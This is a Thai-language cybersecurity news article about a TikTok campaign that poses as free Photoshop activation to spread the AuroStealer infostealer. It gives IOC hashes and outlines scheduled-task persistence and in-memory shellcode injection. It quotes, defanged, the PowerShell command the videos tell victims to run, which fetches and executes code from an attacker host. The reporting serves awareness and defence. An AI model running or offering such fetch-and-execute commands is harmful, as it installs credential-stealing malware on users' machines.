แฮกเกอร์ใช้ TikTok หลอกปล่อยมัลแวร์ขโมยข้อมูล โดยล่อลวงว่าเป็น Photoshop แจกฟรี

TikTok นั้นถึงแม้จะเป็นโซเชียลมีเดียในรูปแบบวิดีโอ และการสตรีมไลฟ์สด ที่ได้รับความนิยมลำดับต้น ๆ ในปัจจุบัน แต่คอนเทนต์บนโซเชียลมีเดียแห่งนี้ก็ไม่ได้มีเพียงคอนเทนต์สาระ และความบันเทิงเท่านั้น ทว่ากลับเต็มไปด้วยคอนเทนต์ปลอมจำนวนมาก หลายตัวยังมีการสร้างเพื่อจุดประสงค์ในการแพร่กระจายมัลแวร์อีกด้วย

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญที่แฮกเกอร์ใช้คลิปวิดีโอบนโซเชียลมีเดีย TikTok มาเป็นเหยื่อล่อให้เหยื่อทำการติดตั้งแอปพลิเคชันปลอมสอดไส้มัลแวร์ในรูปแบบที่แฮกเกอร์ทำการคอมไพล์ตนเองได้ (Self-Compiled Malware) ซึ่งแคมเปญดังกล่าวนั้นถูกตรวจพบโดยทีมวิจัยจาก Internet Storm Center สถาบันวิจัยด้านความปลอดภัยไซเบอร์ ซึ่งคลิปต่าง ๆ นั้นจะเป็นการหลอกว่ามีการแจกรหัสสำหรับการเปิดใช้งานแอปพลิเคชันชื่อดัง เช่น Photoshop ฟรี โดยบางคลิปนั้นมีผู้ไลก์คลิปมากถึง 500 ไลก์ ไปเป็นที่เรียบร้อยแล้ว

ซึ่งขั้นตอนในการหลอกลวงนั้น ตัวคลิปจะขอให้เหยื่อทำการเปิด PowerShell ขึ้นมาแล้วทำการรันคำสั่ง iex (irm slmgr[.]win/photoshop) โดยอ้างว่า เป็นการรันคำสั่งเพื่อติดตั้งแอปพลิเคชันเวอร์ชันใช้งานฟรี โดยวิธีการดังกล่าวนั้นเป็นวิธีการที่คล้ายคลึงกับ ClickFix ที่หลอกให้เหยื่อป้อนคำสั่งผ่านทาง Command Line หรือ Terminal ในกรณีของการใช้งานผ่าน macOS

โดยหลังจากที่เหยื่อได้ป้อนคำสั่งเป็นที่เรียบร้อยแล้วก็จะนำไปสู่การดาวน์โหลด Shell Code สำหรับการติดตั้งมัลแวร์จากเซิร์ฟเวอร์ระยะไกล โดยเริ่มต้นจากการดาวน์โหลดไฟล์มัลแวร์ (Payload) ตัวแรกลงมา โดยข้อมูลระบุตัวตนของไฟล์ตามมาตรฐาน SHA256 นั้นจะมีลักษณะดังนี้

6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23

หลังจากนั้นสคริปท์ก็จะรันผ่านทาง updater.exe เพื่อดาวน์โหลด Payload ตัวที่ 2 ลงมาจากเซิร์ฟเวอร์ที่ตั้งอยู่บน URL ชื่อว่า hxxps://file-epq[.]pages[.]dev/updater.exe โดยจากการวิเคราะห์แล้ว Payload ดังกล่าวเป็นมัลแวร์ประเภทขโมยข้อมูล หรือ Infostealer ที่มีชื่อว่า AuroStealer ซึ่งตัวมัลแวร์จะมุ่งเน้นไปยังการขโมยข้อมูลอ่อนไหว เช่น รหัสผ่านต่าง ๆ และข้อมูลระบบของเหยื่อ โดยสำหรับ Payload ตัวนี้แหล่งข่าวไม่ได้ให้ข้อมูล SHA256 มาแต่อย่างใด

ทางทีมวิจัยยังพบกลไกสำหรับการสร้างการคงอยู่บนระบบ (Persistence) ด้วยการตั้งเวลาการทำงาน (Task Schedule) ที่มีการปลอมตัว Task ให้เหมือนกับ Process ทั่ว ๆ ไปเพื่อความแนบเนียนผ่านทางการใช้งาน “MicrosoftEdgeUpdateTaskMachineCore” ทำให้ตัวมัลแวร์สามารถแอบซ่อนอยู่บนระบบ ในขณะเดียวกันก็สามารถรันตัวเองขึ้นมาใหม่ได้ทุกครั้งที่มีการบูทเครื่องใหม่

หลังจากนั้นก็จะเป็นการดาวน์โหลด และฝัง Payload ตัวที่ 3 ที่เป็น Self-Compiled Malware ของแฮกเกอร์ที่มีชื่อว่า source.exe โดยมัลแวร์ตัวนี้จะสามารถคอมไฟล์ตัวเองในรูปแบบโค้ดภาษา C# ระหว่างช่วงการรัน (Runtime) ด้วยการใช้ .NET Framework (C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe) เพื่อหลบเลี่ยงระบบการตรวจจับบนเครื่องของเหยื่อ ซึ่งการคอมไพล์ตัวเองนั้นจะเกิดขึ้นระหว่างการนำเข้าฟังก์ชันต่าง ๆ เช่น VirtualAlloc, CreateThread และ WaitForSingleObject จากไฟล์ kernel32.dll เพื่อใช้ในการหาพื้นที่หน่วยความจำที่สามารถรันโค้ดได้, ยิง ShellCode ลงไปในส่วนหน่วยความจำ Process Memory โดยตรง และสร้าง Thread เพื่อรัน Payload อื่น ๆ บนหน่วยความจำโดยตรง (In-Memory) โดยที่ไม่มีความจำเป็นต้องเขียนไฟล์เพิ่มบนดิสก์แต่อย่างใด ซึ่งข้อมูลระบุตัวตนมาตรฐาน SHA256 ของ Payload ตัวนี้นั้นจะมีลักษณะ ดังนี้

db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011